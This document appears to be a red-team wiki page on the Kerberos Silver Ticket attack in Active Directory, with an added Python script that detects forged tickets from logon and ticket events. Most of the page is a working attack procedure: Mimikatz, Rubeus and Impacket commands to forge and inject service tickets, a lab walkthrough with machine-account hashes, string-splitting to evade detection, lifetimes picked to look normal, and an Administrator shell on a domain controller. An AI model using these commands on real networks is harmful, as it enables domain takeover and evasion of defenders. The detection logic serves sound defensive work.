# Silver Ticket

<figure><img src="https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2F7ydZ3B21fgPvtO3Bfm5o%2Fimage.png?alt=media&#x26;token=21246ef4-75d6-4506-a1b7-52ae6860ea4b" alt=""><figcaption></figcaption></figure>

## Silver Ticket

In a Silver Ticket attack, we forge a service ticket (TGS) for a single service, without needing to compromise a domain controller.

* We first obtain the secret of the account the target service runs under: its NTLM hash (RC4 key) or its AES Kerberos key. For services such as cifs, host or http on a machine, that is the computer account (e.g. DCORP-DC$); for an SPN registered to a user account, it is that user's key.
* Forge the TGS using Mimikatz (or Rubeus, or Impacket's ticketer.py), choosing the SPN, the target host, and the user and group memberships we want in the PAC.
* Use the forged TGS to authenticate to that service as the chosen user. The service decrypts the ticket with its own key and trusts the PAC inside it. Services running as SYSTEM or Network Service do not ask the DC to validate the PAC signature; a service running under an ordinary user account may, and the forged KDC signature would then fail.
* Unlike a Golden Ticket, which is a forged TGT that must still be presented to a DC to obtain service tickets, a Silver Ticket is presented directly to the service, so the DC logs no 4768/4769 events for it; only the target host records a logon. That makes it **stealthier**.
* Note: a Golden Ticket provides access to any service on any machine, whereas a Silver Ticket only provides access to a particular service on a particular machine. The lifetime of either is whatever the forger sets (Mimikatz's default is 10 years); the example below uses /endin:600 /renewmax:10080 to match the default 10-hour ticket / 7-day renewal policy, because an unusually long lifetime is itself a detection signal.
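The "no interaction with the DC" property is also exactly what a defender keys on. The script below is an added example, not part of the original page: it correlates constructed 4624 (logon) records from the target host with constructed 4769 (service ticket requested) records from the DC and flags Kerberos network logons for which the DC never issued a service ticket. The event field subsets, the sample values and the 600-minute window are assumptions stated in the code.

```python
"""Detection check for Silver Tickets: a forged service ticket never passes through
the KDC, so the target logs a Kerberos network logon (4624) for which no DC
ever logged a matching service-ticket request (4769).

The sample events below are constructed for this example, not captured logs.
"""
from datetime import datetime, timedelta

# 4769 (service ticket requested) as collected from the DC. "service" is the
# account the SPN belongs to; for cifs/host/http on dcorp-dc that is DCORP-DC$.
DC_4769 = [
    {"time": "2024-05-01T08:00:00", "account": "alice@DOLLARCORP.MONEYCORP.LOCAL",
     "service": "DCORP-DC$", "client_ip": "172.16.1.50"},
]

# 4624 (logon) as collected from dcorp-dc itself. Logon type 3 = network logon.
HOST_4624 = [
    {"time": "2024-05-01T08:00:03", "account": "alice", "logon_type": 3,
     "auth_package": "Kerberos", "src_ip": "172.16.1.50"},
    {"time": "2024-05-01T09:15:00", "account": "Administrator", "logon_type": 3,
     "auth_package": "Kerberos", "src_ip": "172.16.2.11"},
    {"time": "2024-05-01T09:20:00", "account": "svc_backup", "logon_type": 3,
     "auth_package": "NTLM", "src_ip": "172.16.2.12"},
]


def _sam(name):
    """Normalise 'user@REALM', 'DOMAIN\\user' or 'user' to a lower-case sAMAccountName."""
    return name.split("@")[0].split("\\")[-1].lower()


def find_orphan_kerberos_logons(host_logons, dc_tgs_events, host_account, window_minutes=600):
    """Return the 4624 records on the host that have no 4769 on the DC for the same
    account and the host's service account within window_minutes before the logon.

    window_minutes defaults to the domain's default maximum service-ticket lifetime
    (600): a legitimate client may reuse a cached ticket for that long, so a
    shorter window produces false positives.
    """
    window = timedelta(minutes=window_minutes)
    orphans = []
    for logon in host_logons:
        # Only Kerberos network logons can come from a forged service ticket.
        if logon["logon_type"] != 3 or logon["auth_package"].lower() != "kerberos":
            continue
        t_logon = datetime.fromisoformat(logon["time"])
        acct = _sam(logon["account"])
        issued = any(
            _sam(ev["account"]) == acct
            and ev["service"].lower() == host_account.lower()
            and timedelta(0) <= t_logon - datetime.fromisoformat(ev["time"]) <= window
            for ev in dc_tgs_events
        )
        if not issued:
            orphans.append(logon)
    return orphans


if __name__ == "__main__":
    # 4769 must be collected from every DC in the domain; a ticket issued by a DC
    # whose logs are missing would otherwise look like a forgery.
    for hit in find_orphan_kerberos_logons(HOST_4624, DC_4769, "DCORP-DC$"):
        print(f"possible forged service ticket: {hit['account']} from {hit['src_ip']} at {hit['time']}")
```

With the constructed data only the Administrator logon at 09:15 is flagged: alice's logon is covered by a 4769 three seconds earlier, and the NTLM logon is out of scope because a Silver Ticket is always Kerberos.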

### Windows:

{% code overflow="wrap" %}

```
# Forge the service ticket. Mimikatz uses the golden module for both ticket types; /service and /target make it a Silver Ticket.
# <HASH> is the NTLM hash of the account the service runs as (the computer account, e.g. DCORP-DC$, for cifs/host/http on a machine); /aes256:<KEY> can replace /rc4 to avoid an RC4-encrypted ticket.
# <SERVICE> is the SPN class (cifs, host, http, ldap, ...) and <TARGET> the host's FQDN. Without /ptt the ticket is written to ticket.kirbi.
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket into the current logon session (either tool); klist shows it afterwards
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell. PsExec needs a cifs ticket for <TARGET>, so forge with /service:cifs
.\PsExec.exe -accepteula \\<TARGET> cmd
```

{% endcode %}

### Linux:

{% code overflow="wrap" %}

```
# Forge the service ticket with Impacket's ticketer.py. <SERVICE_PRINCIPAL_NAME> is the full SPN, e.g. cifs/<TARGET_FQDN>;
# -aesKey <KEY> can replace -nthash. The ticket is written to a .ccache named after <USER> in the current directory.
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>

# Point the Kerberos-aware tools at the forged credential cache
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 

# Authenticate with the cached ticket (-k -no-pass). <TARGET> must be the same FQDN as in the SPN and resolvable from the attacker host
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
```

{% endcode %}

### Attack in Practice:

When we have the NTLM or AES hash of the DC's machine account (dcorp-dc$), we can create a Silver Ticket that provides access to a service on the DC. Once the ticket is imported, we can get a shell on the DC as Administrator.

{% code overflow="wrap" %}

```powershell
# ArgSplit for "silver" (Rubeus's silver command, split so the literal string never appears; %Pwn% holds the reassembled argument)
# Use the NTLM (/rc4) or AES (/aes256) hash of the machine account dcorp-dc$ to forge and import a ticket for the http service, which is what winrs/WinRM uses. /ldap fills the PAC from LDAP instead of guessing group memberships.
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# Similarly for WMI using BetterSafetyKatz.exe. WMI needs both HOST and RPCSS tickets, so repeat with /service:RPCSS.
# /endin:600 and /renewmax:10080 (minutes) match the default 10-hour ticket / 7-day renewal policy so the ticket does not stand out.
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

# The same command works for any other service on a machine. Which services? HOST, RPCSS, HTTP, CIFS, LDAP and many more.

# Since the http ticket is imported, we can get a shell on the DC and execute commands as Administrator.
C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
```

{% endcode %}

